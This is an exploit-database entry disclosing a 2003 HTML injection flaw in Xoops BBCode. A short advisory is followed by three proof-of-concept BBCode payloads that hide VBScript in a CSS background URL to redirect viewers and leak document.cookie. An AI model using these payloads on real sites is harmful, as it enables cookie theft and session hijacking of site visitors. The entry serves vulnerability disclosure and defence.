Xoops 1.0/1.3.x - BBCode HTML Injection

Author: frog
type: webapps
platform: php
port: 
date_added: 2003-08-13 
date_updated: 2012-11-30 
verified: 1 
codes: OSVDB-2422 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8414/info

Xoops BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of Xoops where BBCode is rendered. This issue is due to a lack of sufficient sanitization performed on user supplied BBCode tags. Injected code may be rendered in the web browser of a user who views vulnerable areas of the site. This would occur in the security context of the site hosting Xoops and its related modules.

[color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]

[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]